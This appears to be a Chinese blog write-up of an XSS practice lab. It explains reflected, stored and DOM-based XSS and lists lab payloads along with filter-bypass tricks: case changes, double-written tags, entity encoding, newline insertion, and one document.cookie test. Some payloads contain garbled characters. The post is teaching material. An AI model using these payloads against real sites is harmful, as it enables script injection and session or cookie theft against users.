XSS通关实战

最新推荐文章于 2024-05-29 14:49:51 发布
最新推荐文章于 2024-05-29 14:49:51 发布
阅读量337 收藏
点赞数 1
文章标签: xss 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55563900/article/details/114646980
版权

XSS基础

跨站脚本(Cross -Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能层到很高的权限(如执行一些操作)、 私密网页内容、 会话和cookie等各种内容。

XSS攻击可以分为三种:反射型、存储型和DOM型。

反射型
反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。、

攻击方式:攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。
存储型XXS
存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。

攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。随着帖子被服务器存储下来,恶意脚本也永久地被存放在服务器的后端存储器中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本会在他们的浏览器中得到执行。
例如,恶意攻击者在留言板中加入以下代码。
( alert (/hacker by hacker/) )
当其他用户访问留言板时,就会看到一个弹窗。可以看到,存储型XSS的攻击方式能够将恶意代码永久地嵌入一个页面中,所有访问这个页面的用户都将成为受害者。如果我们能够谨慎对待不明链接,那么反射型XSS攻击将没有多大作为,而存储型XSS则不同,由于它注入在一些我们信任的页面,因此无论我们多么小心,都难免会受到攻击。
DOM型XSS
DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。
攻击方式:用户请求一个经过专]设计的URL,它由攻击者提交,而且其中包
含XSS代码。服务器的响应不会以任何形式包含攻击者的脚本。当用户的浏览器处理这个响应时,DOM对象就会处理XSS代码,导致存在XSS漏洞。

反射型XSS攻击
页面http://192.168.1.101/xss/xss1.php实现的功能是在"输入”表单中输入内容,单击"提交”按钮后,将输入的内容放到"输出”表单中,例如当输入“11”,单击"提交”按钮时,“11” 将被输出到“输出”表单中
在这里插入图片描述
当访问http://192.168.1.101/xss/xss1.php?xss_ input value="> <imgsrc=1 οnerrοr=alert (/xss/) />时,输出到页面的HTML代码变为<inputtype=“text"value=”"> <img src=1 οnerrοr=alert (/xss/) />">,可以看到,输入
在这里插入图片描述
接下来,在浏览器渲染时,执行了<img src=1 οnerrοr=alert (/xss/) />,JS函数alert ()导致浏览器弹框,显示"/xss/"

反射型XSS代码分析
在反射型XSS PHP代码中,通过GET获取参数xss_ input value的值,然后通过echo输出一个input标签, 并将xss input_ value的值放入input标签的value中。当访问xss_ input value="> <img src=1 οnerrοr=alert (/xss/) />时,输出到页面的HTML代码变为<input type= “text"value=”"> <img src=1 οnerrοr=alert (/xss/) />">,此段HTML代码有两个标签, 标签和标签,而标签的作用就是让浏览器弹框显示"/xss/"

存储型XSS攻击
储存型XSS页面实现的功能是:获取用户输入的留言信息、标题和内容,然后
将标题和内容插入到数据库中,并将数据库的留言信息输出到页面上
在这里插入图片描述
当用户在标题处写入1,内容处写入2时,数据库中的数据会显示标题为1,内容为2当输入标题为<img SRC=X οnerrοr=alert(xss/)/>,然后将标题输出到页面时,页面执行了<img src=1 οnerrοr=alert (/xss/) />,导致弹出窗口。此时,这里的XSS是持久性的,也就是说,任何人访问时该URL时都会弹出一个显示"/xss/" 的框
在这里插入图片描述
DOM型XSS攻击
DOM型XSS攻击页面实现的功能是在"输入”框中输入信息,单击“替
换"按钮时,页面会将”这里会显示输入的内容”替换为输入的信息,例如当输
入“11”的时候,页面将"这里会显示输入的内容”替换为"11"
在这里插入图片描述
在这里插入图片描述
当输入<img src=1 οnerrοr=alert(/xss/)/>时,单击"替换”按钮,页面弹出消息框
在这里插入图片描述

XSS常用测试语句

<script> alert(xss)</script>
<img src=1 onerror=alert(xss)>
<a herf=javascript: alert(xss)>
<svg onload=alert(xss)>

XSS靶场绕过之基本绕过1

payload: 'οnclick='window.alert()
过滤括号,单引号闭合
在这里插入图片描述

XSS靶场绕过之基本绕过2

payload:"οnclick="window.alert()
过滤尖括号,双引号闭合
在这里插入图片描述

DOM型XSS

payload:#’ οnclick=alert(“xss”)> 二:javascript:alert(/aa/)
我们通过闭合的方式构造Payload
在这里插入图片描述

XSS靶场绕过之关键字1

payload:"ONclick="window.alert()
大小写即可绕过
在这里插入图片描述

XSS靶场绕过之关键字2

双写绕过

payload: "><scrscriptipt>alert()</scrscriptipt>

在这里插入图片描述

XSS靶场绕过之关键字3

payload: "><a href="javascript:alert(1)">
在这里插入图片描述

XSS靶场之过滤XSS

 <script>(document.cookie)</script>

在这里插入图片描述

XSS靶场之属性注入

payload:"οnclick="alert() 二:"><script>alert()</script>
在这里插入图片描述

XSS靶场绕过之关键字4

payload:

javascrip&#x74;:alert(/aa/)

在这里插入图片描述

XSS靶场绕过之特殊绕过

利用%0d、%0a(回车换行)实现xss攻击绕过
pauload:<img%0asrc=1%0aοnerrοr=alert(1)>
在这里插入图片描述

&Lj
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1603
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
xss之存储型
xu_1234567的博客
11-04 4736
1.存储型xss原理 存储型xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储型low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
存储型XSS
最新发布
2401_84466361的博客
05-29 1034
什么是存储型xss:提交恶意xss数据,存入数据库中,访问时触发。存储型xss和反射型xss区别:存储型存入数据库中,可持续时间长,而反射型持续时间短,仅对本次访问有影响,反射型一般要配合社工。存储型xss操作过程:嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。存储型xss可能出现的位置:可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息....同源策略。
XSS基础——xsslabs通关挑战
weixin_53284312的博客
02-18 3068
xss基础——xsslabs 闯关
第十三章—手动漏洞挖掘(十)——XSS(三)
weixin_43876557的博客
04-09 1067
存储型XSS 1. 概述 反射型xss和存储型xss的区别是: 反射型xss需要一系列的社会工程学等各种欺骗方式诱使别人点击你发送给他的连接地址,利用起来较麻烦。 存储型xss漏洞利用之后造成的威胁性更大,利用难度也较容易一些。 存储型xss,利用代码长期存储在服务器端。渗透测试者一次性发起漏洞利用代码后,利用代码就会注入到服务器存在漏洞的页面,之后每当有人访问该页面,都会从服务器下载这段攻击性的代码脚本,在本地浏览器中执行。只要渗透测试者攻击后开着主机侦听端口等待有人访问该网页,就会像钓鱼一样上钩,客户端
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战
m0_67844671的博客
10-05 3804
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的...
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-lab全通关教程
05-07
此外,完成所有关卡后,博主还提供额外的XSS环境,这将帮助你进一步熟悉实战场景,提高你的技能。在实际环境中,你可能会遇到更复杂的情况,如多重过滤、多层防御,甚至与其他安全机制的交互。 总的来说,这份“XSS...
SpringBoot +esapi 实现防止xss攻击 实战代码
11-25
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过注入恶意脚本到...在实战代码中,你可以根据提供的文件进一步了解具体的实现细节,包括类的定义、方法的调用以及可能的配置选项。
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
XSS攻击实战
qq_44915227的博客
04-18 2392
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
XSS-存储型
qq_39416206的博客
03-14 450
一、知识点 同源策略: 所谓同源:需要同 域名/host、端口、协议 存储型xss是什么 提交恶意xss数据,存入数据库中,访问时触发。 存储型xss可能出现的位置 可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息 获取到别人的Cookie怎么登陆别人用户 可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器 存储型XSS怎么预防? XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.
存储型xss_WEB安全XSS(1)
weixin_39653448的博客
12-05 816
大家好,我是阿里斯,一名IT行业小白。由于工作原因停更已经好久,中间虽然也水了俩篇文章,但是个人感觉该继续水下去了,因为收到了不止一位粉丝的监督。那么就从今天开始吧,接下来的主要内容主要围绕xss展开。什么是同源策略同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用javascript读取abc.com里面的文件...
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
Xss小游戏通关攻略带解释
sirius的博客
08-28 5452
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
xsschallenge靶场通关-1~13
m0_58265086的博客
08-27 148
这里将test改成1发生没有过滤可以直接输出,那么可以直接使用代码进行注入测试了输入代码直接注入xss代码将1换成我们注入的代码,即可通关
XSS漏洞
zhoutong2323的博客
04-19 1354
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
xss漏洞知识总结
ma963852的博客
04-14 5627
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类型: (1)反射型 反射型xss又称非持久性xss,需要用户点击带有
dvwa靶场xss通关
08-15
为了在DVWA靶场中完成XSS通关,你可以尝试以下步骤: 1. 注入脚本:在输入框或者参数中注入恶意脚本代码,比如上面提到的payload,如<img src=x οnerrοr=document.write('<img src=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值